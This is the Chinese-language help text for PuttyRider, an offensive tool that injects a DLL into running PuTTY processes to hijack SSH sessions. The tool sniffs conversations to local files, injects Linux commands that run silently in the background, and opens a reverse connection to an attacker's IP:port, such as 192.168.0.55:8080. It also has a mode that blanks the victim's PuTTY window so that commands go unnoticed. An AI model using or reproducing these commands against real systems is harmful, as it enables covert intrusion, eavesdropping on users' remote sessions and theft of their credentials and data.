劫持Putty会话,用于嗅探对话并注入Linux命令。
列出正在运行的Putty进程及其状态(已注入/未注入)
PuttyRider.exe -l
将DLL注入到第一个找到的putty.exe中,并建立从DLL到我的IP:Port的反向连接,然后退出PuttyRider.exe。
PuttyRider.exe -p 0 -r 192.168.0.55:8080
后台运行并等待新的Putty进程。注入任何新的putty.exe并将所有对话写入本地文件。
PuttyRider.exe -w -f
从所有已注入PuttyRider.dll的Putty进程中卸载该DLL。 (如果以-w模式运行,别忘了终止PuttyRider.exe,否则它会再次注入。)
PuttyRider.exe -x
操作模式:
-l 列出正在运行的Putty进程及其连接
-w 注入所有现有Putty会话并等待新会话,也对这些新会话进行注入
-p PID 仅注入由PID标识的现有Putty会话。
如果PID==0,则注入第一个找到的Putty进程
-x 清理。从所有正在运行的Putty实例中移除DLL
-d 调试模式。仅与-p模式配合使用
-c CMD 成功注入后自动执行一个Linux命令
PuttyRider会移除CMD末尾的空格和'&'字符
PuttyRider会将" 1>/dev/null 2>/dev/null &"追加到CMD末尾
-h 打印此帮助信息
输出模式:
-f 将所有Putty对话写入本地目录的文件中。
文件名将附加当前putty.exe的PID
-r IP:PORT 建立到指定机器的反向连接并启动交互式会话。
交互式命令(在收到反向连接后):
!status 查看Putty窗口是否连接到用户输入
!discon 断开主Putty窗口的显示,使其不再显示任何内容
这在用户不注意的情况下发送命令很有用
!recon 将Putty窗口重新连接到正常操作模式
CMD Linux shell命令
!exit 终止此连接
!help 显示客户端连接帮助
使用Visual Studio命令提示符:
nmake main dll
感谢Insomnia Security的Brett Moore提供的概念验证工具PuttyHijack